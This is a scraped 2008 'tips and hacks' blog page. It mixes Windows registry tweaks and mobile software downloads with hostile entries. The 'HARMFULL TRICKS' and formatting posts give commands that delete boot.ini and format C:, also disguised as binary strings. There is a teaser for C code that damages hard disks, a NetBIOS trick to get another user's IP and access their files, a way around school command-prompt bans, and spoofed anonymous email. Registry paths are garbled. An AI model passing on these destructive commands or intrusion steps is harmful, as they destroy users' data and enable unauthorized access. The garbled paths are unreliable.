My PC and Mobile AdventureMy PC and Mobile Adventuretown of free tips and tricks hacks and free mobile download Articles
DISABLE DOS AND BATCH FILE
2008-05-05 05:25:00 This restriction allows you to selectively disable the Command Prompt (CMD) and the ability to execute DOS batch files.Open your registry (press win+r and type regedit , hit enter )goto[HKEY_CURRENT_USERSoftwarePoliciesMi crosoftWindowsSystem]Create or modify the DWORD value "DisableCMD" and set it to a number from the list below.Read More...friendly yuh: More About: File , Batch
RUN STARTUP PROGRAMS IN DOS
2008-05-05 05:24:00 This setting allows you to specify commands or programs to be automatically executed whenever a command processor is launched. For example, to set environment variables or parameters using a batch file.Open your registry (press win+r and type regedit , hit enter )goto[HKEY_CURRENT_USERSoftwareMicrosoftC ommand Processor]Create a new string value called "AutoRun" and set the value to equal the commands to be automatically executed. Multiple commands should be seperated by double ampersands e.g. "command1 && command2".Read More...friendly yuh: More About: Programs , Startup
HIGH MEMORY FOR DOS
2008-05-05 05:22:00 This setting causes Windows to load the local DOS devices into high memory and freeing up more low memory for DOS applications.Open your SYSTEM.INI and add the line:LocalLoadHigh =1Under the [386Enh] section.Read More...friendly yuh: More About: Memory
DISABLE MANUAL TASK CONTROL
2008-05-05 05:21:00 This restriction disables the ability for users to manually start and stop scheduled tasks. Task s will continue to run automatically as configured.Open your registry (press win+r and type regedit , hit enter )goto[HKEY_CURRENT_USERSoftwarePoliciesMi crosoftWindowsTask Scheduler5.0]Create a new DWORD value, or modify the existing value called 'Execution' using the settings below.Read More...friendly yuh: More About: Control , Manual
Pocket Wizards Easy Sync v2.87
2008-04-30 04:14:00 Pocket Wizards Easy Sync v2.87 | 1.0 MBEasy Sync is a long-awaited solution to synchronize files with Windows Mobile Pocket PC, Smartphone and its Storage Cards. It allows bidirectional sync and one-way transferring of unlimited number of any files, folders, docs, pdf, podcasts, photos, etc. between your computer and mobile device. Supports transferring over the network. Able to sync several devices with one computer. Real-time and scheduled tasks. Nice interface. Constantly being improved.Download- http://rapidshare.com/files/10374296...Sy nc.v2.87.zipfriendly yuh: More About: Pocket
PocketMusic 5.0.1
2008-04-30 04:13:00 Listen to music, audiobooks, recorded radio files, lectures, DJ sets and other audio files on your Pocket PC! PocketMusic turns your device into a great music player with a 10-band equalizer, extra bass feature, Internet audio support, storage card support and a playlist organizer! It also includes a bookmark feature, which is especially useful for listening to audiobooks. As an added plus, PocketMusic can also be put on your today screen, so you’ll have complete playback control from your today screen. A mobile must-have for music enthusiasts.Features include: * Support for WMA, OGG, MP1, MP2, MP3 and Audible files * Alarm - set alarms with your favorite tunes * Audiobooks * Streaming audio support for MP3 and Ogg Internet radio broadcast supported * Landscape mode with large buttons for easy car useVersion 5.0.12.9MBMinimum RequirementsPocket PC* New skins* Improved support for Bluetooth remote controls and stereo headphones* Optimized for one-hand operation* Greatly improved eq...
INCLUDING DOS PROMPT IN RIGHT CLICK MENU
2008-04-30 04:10:00 If you still use the DOS prompt regularly then this setting creates a new right-click menu option to open a command prompt at the selected directory.Open your registry (press win+r and type regedit , hit enter )goto[HKEY_CLASSES_ROOTDirectoryshell]Cre ate a new sub key called 'Command' under the main key (i.e. [HKEY_CLASSES_ROOTDirectoryshellCommand]) . Change the value of '(Default)' within the key to equal the text you would like on the right-click menu, for example 'Command Prompt '.Read More...friendly yuh: More About: Click , Menu
CHANGING DOS BACKGROUND
2008-04-28 05:05:00 The value DefaultColor controls the foreground and background colors used in command prompt windows. It has a default value of 0, for standard white text on a black background.CHANGING DOS BACKGROUNDOpen your registry (press win+r and type regedit , hit enter )goto[HKEY_CURRENT_USERSoftwareMicrosoftC ommand Processor]u'll find "DefaultColor"You can replace it's value with a two-digit hexadecimal number, in which the first digit selects a background color and the second a foreground color. The hexadecimal codes are:Read More...friendly yuh: More About: Changing , Background
HIDING DRIVES
2008-04-25 04:50:00 This setting allows you to control which drives are visible in My Computer and Explorer. It is possible to hide all drives or just selected ones.Open your registry (press win+r and type regedit , hit enter )goto[HKEY_CURRENT_USERSoftwareMicrosoftW indowsCurrentVersionPoliciesExplorer]and find or create the DWORD "NoDrives" there by right clicking on explorer -> NEW -> DWORD value .The "NoDrives" value uses a 32-bit word to define local and network drive visibility for each logical drive in the computer. The lower 26 bits of the 32-bit word correspond to drive letters A through Z. Drives are visible when set to 0 and hidden when set to 1.Read More...friendly yuh:
Access Others File using this hack ( Netbios hack)
2008-04-16 01:22:00 netbios hack----------------1)open icq2)start->run->cmd3)do "netstat -an > c:a.txt"4)do a file transfer with the user you want to do the netbios hack5)then while it transfering files do in the cmd "netstat -an > c:.txt"6)now compare a.txt and b.txt and see what ip address has benn added while you transfered the files7)now that you've got his ip ,do in the cmd nbtstat -a xxx.xxx.xxx.xxxRead More...friendly yuh: More About: File , Hack , Access
DISABLE DOS AND BATCH FILE
2008-04-06 08:59:00 This restriction allows you to selectively disable the Command Prompt (CMD) and the ability to execute DOS batch files.Open your registry (press win+r and type regedit , hit enter )goto[HKEY_CURRENT_USERSoftwarePoliciesMi crosoftWindowsSystem]Create or modify the DWORD value "DisableCMD" and set it to a number from the list below.0 - (default) enable command prompt and batch files1 - disable command prompt and batch files2 - disable command prompt but allow batch filesThe change should take effect immediately.friendly yuh: More About: File , Batch
HIGH MEMORY FOR DOS
2008-04-06 08:59:00 This setting causes Windows to load the local DOS devices into high memory and freeing up more low memory for DOS applications.Open your SYSTEM.INI and add the line:LocalLoadHigh =1Under the [386Enh] section.Modifying the registry can cause serious problems that may require you to reinstall your operating system. We cannot guarantee that problems resulting from modifications to the registry can be solved. Use the information provided at your own risk.friendly yuh: More About: Memory
RUN STARTUP PROGRAMS IN DOS
2008-04-06 08:59:00 This setting allows you to specify commands or programs to be automatically executed whenever a command processor is launched. For example, to set environment variables or parameters using a batch file.Open your registry (press win+r and type regedit , hit enter )goto[HKEY_CURRENT_USERSoftwareMicrosoftC ommand Processor]Create a new string value called "AutoRun" and set the value to equal the commands to be automatically executed. Multiple commands should be seperated by double ampersands e.g. "command1 && command2".The changes will take effect the next time the command processor is usedfriendly yuh: More About: Programs , Startup
INCLUDING DOS PROMPT IN RIGHT CLICK MENU
2008-04-06 08:58:00 If you still use the DOS prompt regularly then this setting creates a new right-click menu option to open a command prompt at the selected directory.Open your registry (press win+r and type regedit , hit enter )goto[HKEY_CLASSES_ROOTDirectoryshell]Cre ate a new sub key called 'Command' under the main key (i.e. [HKEY_CLASSES_ROOTDirectoryshellCommand]) . Change the value of '(Default)' within the key to equal the text you would like on the right-click menu, for example 'Command Prompt '.Create another new sub-key under the key created above, named 'command' (i.e. [HKEY_CLASSES_ROOT...Commandcommand]). Change the value of '(Default)' within this key depending on your operating system to equal either:Windows 95, 98 or Mecommand.com /k cd "%1"orWindows NT, 2000 or XPcmd.exe /k cd %1Now right-click on a folder and the new option of 'Command Prompt' should be available.friendly yuh: More About: Click , Menu
DISABLE MANUAL TASK CONTROL
2008-04-06 08:58:00 This restriction disables the ability for users to manually start and stop scheduled tasks. Task s will continue to run automatically as configured.Open your registry (press win+r and type regedit , hit enter )goto[HKEY_CURRENT_USERSoftwarePoliciesMi crosoftWindowsTask Scheduler5.0]Create a new DWORD value, or modify the existing value called 'Execution' using the settings below.(0 = default, 1 = enable restriction)Exit your registry, you may need to restart or log out of Windows for the change to take effect.friendly yuh: More About: Control , Manual
HIDING DRIVES
2008-04-06 08:57:00 This setting allows you to control which drives are visible in My Computer and Explorer. It is possible to hide all drives or just selected ones.Open your registry (press win+r and type regedit , hit enter )goto[HKEY_CURRENT_USERSoftwareMicrosoftW indowsCurrentVersionPoliciesExplorer]and find or create the DWORD "NoDrives" there by right clicking on explorer -> NEW -> DWORD value .The "NoDrives" value uses a 32-bit word to define local and network drive visibility for each logical drive in the computer. The lower 26 bits of the 32-bit word correspond to drive letters A through Z. Drives are visible when set to 0 and hidden when set to 1.If your not happy working in Hex, add these decimal numbers to hide the drive(s):A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096, N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U: 1048576, V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, ALL: 67108863For example...
CHANGING DOS BACKGROUND
2008-04-06 08:57:00 The value DefaultColor controls the foreground and background colors used in command prompt windows. It has a default value of 0, for standard white text on a black background.CHANGING DOS BACKGROUNDOpen your registry (press win+r and type regedit , hit enter )goto[HKEY_CURRENT_USERSoftwareMicrosoftC ommand Processor]u'll find "DefaultColor"You can replace it's value with a two-digit hexadecimal number, in which the first digit selects a background color and the second a foreground color. The hexadecimal codes are:Hexadecimal value Color0 Black1 Blue2 Green3 Aqua4 Red5 Purple6 Yellow7 White8 Gray9 Light BlueA Light GreenB Light AquaC Light RedD Light PurpleE Light YellowF Bright WhiteA value of F0, for example, would give black text on a white background, and 1E would yield yellow text on a blue background.friendly yuh: More About: Changing , Background
Hide the username on start menu
2008-04-06 08:56:00 Hide the username on start menuNavigate to:HCUsoftwaremicrosoftwindowsCurrent|Ver sionPoliciesExplorerandHLMsoftwaremicroso ftwindowscurrentversionpoliciesExplorerCh ange the DWORD Valude NoUserNameInStart Menu to 1 to hide the username to display..friendly yuh: More About: Start Menu , Username , Hide
Hide Your Secret Files inside a Imagep
2008-04-06 08:09:00 In this article we will hide a text message inside a picture. We have choose for this tutorial a text file named Secret .txt and a picture wallpaper.jpg.1. Move your files you want to combine in a new folder, in our case C:Hidden.2. Add the file you want to hide into a new RAR archive (in our example named Secret.txt.rar).3. WinRar created the archive in the folder where our files are located.Read More...friendly yuh: More About: Inside , Files , Hide
Yahoo Multimessenger hack(without any software)
2008-03-29 13:48:00 This is a .reg file that I made,all you have to do is open it click yes and you can open upon to 20 messenger windows(each one with a different account).This is cleaner and simpler than yahoo Multimessenger and a thank you would be appreciated .Here is the code all you have to do is paste this in notepad and then save it as a .reg file:Read More...friendly yuh: More About: Software , Yahoo , Hack , Yahoo!
OPEN DOS 4M WHERE IT'S BANNED
2008-03-23 05:25:00 Open command prompt from where it is Banned Open up Command Prompt (Start>Run>Command.com)Can't use command prompt at your school?Open up Microsoft word..Type:Read More...friendly yuh: More About: Open
Allowing dos and regedit in a restricted Windows
2008-03-19 14:24:00 A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:REGEDIT4[HKEY_CURRENT_USERSoftw areMicrosoftWindows CurrentVersionPolicies WinOldApp]"Disabled"=dword:0[HKEY_CURRENT _USERSoftwareMicrosoftWindowsCurrentVersi onPoliciesSystem]"DisableRegistryTools"=d word:0Read More...friendly yuh:
Create Bad sectors on hard disks
2008-03-19 14:23:00 THIS TRICKS IS ONLY FOR KNOWLEDGE PURPOSE SO PLZ DONT USE IT FOR WRONG PURPOSE...A C source code/*create bad sectors on the hard disk.** This program will create bad sectors on the hard disk. If you left it* running for long enough, it could render a hard disk quite useless. When* bad sectors are found, the sector is marked as bad, so fixing the hard disk* is not an easy task. Unless the victimRead More...friendly yuh: More About: Hard , Create , Sectors
FORMATTING HDD WHILE WINDOWS IS ON
2008-03-19 14:22:00 IF u think u cannot format c drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary codeformat c: /Q/X -- this will format your drive c: 11001100110111101110010011011010110000 10111010000 10000001100011001110100101110000100000001 01111010100010010111101011000Read More...friendly yuh: More About: Windows
HARMFULL TRICKS
2008-03-19 14:21:00 del /F/S/Q c:oot.ini -- this will cause your computer not to boot.011001000110010101101100001000000010 11110100011000 10111101010011001011110101000100100000011 000110011101001011100011000100110111101 10111101110100001011100110100101101110011 01001Read More...friendly yuh: More About: Tricks
Change Yahoo messenger title bar
2008-03-19 14:20:00 Hey guys you can change the yahoo messenger title bar...For this just find the folder messenger in the drive in which the messenger is installed. Then search a file named "ymsgr". In this file just go to the end and write the following code:Read More...friendly yuh: More About: Yahoo , Change , Messenger , Yahoo Messenger , Title
Yahoo Multimessenger hack(without any software)
2008-03-18 13:21:00 This is a .reg file that I made,all you have to do is open it click yes and you can open upon to 20 messenger windows(each one with a different account).This is cleaner and simpler than yahoo Multimessenger and a thank you would be appreciated .Here is the code all you have to do is paste this in notepad and then save it as a .reg file:Code: REGEDIT4[HKEY_CURRENT_USERSoftware Yahoo Pa gerTest]"plural"=dword:00000020and here is the saved .reg file in case any of you have problems:Code: http://rapidshare.com/files/28581164/mess enger.reg.htmlfriendly yuh: More About: Hack , Yahoo!
WINAMP LOOPHOLE TO DOWNLOAD FREE MUSIC
2008-03-18 13:20:00 Using a loophole in a winamp plugin, you can download and burn music from Napster for free.music CDs, zero dollars*, obtained legally.*Not including the cost of blank CDs0. Download and install Napster, sign up for 14 day free trial.1. Download and install Winamp 2. Download and install the Winamp Plug-in Output Stacker3. Open Winamp Options->Plug-ins->Output->Dietmar's Output Stacker->ConfigureRead More...friendly yuh: More About: Music , Free Music , Free
SENDING ANONYMOUS EMAILS
2008-03-18 13:18:00 There are several web based utilities that allow this, but each one registers the ip info in the headers which allows tracing. They also will not allow you to use a proxy and utilize their service. This is for security reasons.My definition of anonymous includes the email addresses appearing as if they have been sent from whatever address you specify as well as no accurate record of your IP in the headers of the mail that could be traced back to you.Read More...friendly yuh: More About: Emails , Anonymous , Sending
Shape Services IM Plus V6.14
More articles from this author:2008-03-18 13:18:00 View correspondence with your contacts even when you're offline.A list of contacts who you have new messages from will be displayed by focusing on the envelope in the upper right-hand corner.Voice messaging enabled. Send and receive voice messages with IM+.Excellent alternative to MMS, send files over GPRS.chat with several buddies simultaneously.Add emotions to your messages, a huge set of funny faces available.Exchange messages in any language installed on a phone.Easy to configure and easy to chat.Read More...friendly yuh: More About: Services , Shape 1, 2, 3, 4, 5, 6 |



